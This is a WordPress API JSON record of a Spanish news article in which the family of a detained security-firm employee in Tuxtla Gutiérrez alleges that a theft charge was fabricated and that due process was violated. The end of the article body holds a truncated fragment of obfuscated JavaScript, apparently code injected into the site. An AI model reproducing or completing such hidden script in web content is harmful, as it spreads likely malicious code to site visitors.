{"id":24513,"date":"2025-10-14T04:57:17","date_gmt":"2025-10-14T04:57:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24513"},"modified":"2025-10-14T04:57:18","modified_gmt":"2025-10-14T04:57:18","slug":"piden-esclarecer-presunta-fabricacion-de-delito-contra-empleado-de-empresa-de-valores","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24513","title":{"rendered":"Piden esclarecer presunta fabricaci\u00f3n de delito contra empleado de empresa de valores"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0024-1024x768.jpg\" alt=\"\" class=\"wp-image-24514\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0024-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0024-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0024-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0024-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0024.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>13 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Familiares de Luis \u201cN\u201d, detenido el pasado lunes acusado del robo de 250 mil pesos a la empresa \u201cSeguridad Privada y Traslado de Valores Elite\u201d, denunci\u00f3 irregularidades en el procedimiento y asegura que se est\u00e1 fabricando un delito para culpar a un inocente, quien apenas llevaba un mes laborando como operador de c\u00e1maras de vigilancia en esta compa\u00f1\u00eda.<\/p>\n\n\n\n<p>Merly Alejandra Hern\u00e1ndez D\u00edaz, esposa de Luis, relat\u00f3 el viacrucis que vivieron para localizar a su esposo, quien permaneci\u00f3 incomunicado desde el momento de su detenci\u00f3n.<\/p>\n\n\n\n<p>&#8220;Mi esposo lo detuvieron el d\u00eda lunes, pero nadie me avis\u00f3. Lo mantuvieron detenido sin comunicaci\u00f3n; no tuve ninguna llamada de \u00e9l ni nada que me alertara d\u00f3nde estaba&#8221;, declar\u00f3 Hern\u00e1ndez D\u00edaz.<\/p>\n\n\n\n<p>La angustia los llev\u00f3 a trasladarse desde Jiquipilas a Tuxtla Guti\u00e9rrez (de donde son originarios) el d\u00eda martes para iniciar la b\u00fasqueda.<\/p>\n\n\n\n<p>Relata que, tras acudir a la Fiscal\u00eda, se les neg\u00f3 inicialmente informaci\u00f3n sobre su paradero, siendo ap\u00e1ticosy desinteresados en su atenci\u00f3n . Solo la intervenci\u00f3n de una empleada que los vio en estado de desesperaci\u00f3n les confirm\u00f3 que Luis hab\u00eda estado all\u00ed para una revisi\u00f3n m\u00e9dica, sin saber despu\u00e9s su destino.<\/p>\n\n\n\n<p>La b\u00fasqueda continu\u00f3 en la Fiscal\u00eda Metropolitana, donde tambi\u00e9n negaron tener reporte alguno sobre \u00e9l.<\/p>\n\n\n\n<p>Siguiendo una pista, se dirigieron a las instalaciones de la prisi\u00f3n preventiva \u201cLa Popular\u201d, donde finalmente confirmaron que Luis Gerardo se encontraba detenido, acusado del robo de 250 mil pesos.<\/p>\n\n\n\n<p>La familia denuncia que se les impidi\u00f3 verlo o comunicarse con \u00e9l inicialmente, violando su derecho a la defensa y al debido proceso.<\/p>\n\n\n\n<p>El mi\u00e9rcoles, agentes de la Fiscal\u00eda Metropolitana se lo llevaron, traslad\u00e1ndolo entre diferentes dependencias sin ofrecer explicaciones claras a los familiares. Finalmente, fue llevado al Juzgado de Control y Enjuiciamiento, conocido como &#8220;El Canelo&#8221;.<\/p>\n\n\n\n<p>&#8220;Lo que nosotros exigimos ahorita es justicia m\u00e1s que nada, que se aclare todo que el juez permita que el abogado aclare todo esto con las pruebas que le va a llevar&#8221;, expres\u00f3 la esposa.<\/p>\n\n\n\n<p>La familia hace un llamado urgente al Fiscal General, Jorge Luis Llaven Abarca, y al Gobernador del Estado, para que atiendan el caso y eviten lo que consideran una grave injusticia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 13 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Familiares de Luis \u201cN\u201d, detenido el pasado lunes acusado del robo de 250 mil pesos a la empresa \u201cSeguridad Privada y Traslado de Valores Elite\u201d, denunci\u00f3 irregularidades en el procedimiento y asegura que se est\u00e1 fabricando un delito para culpar a un inocente, quien apenas llevaba &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24514,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24513","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24513","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24513"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24513\/revisions"}],"predecessor-version":[{"id":24515,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24513\/revisions\/24515"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24514"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24513"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24513"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24513"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}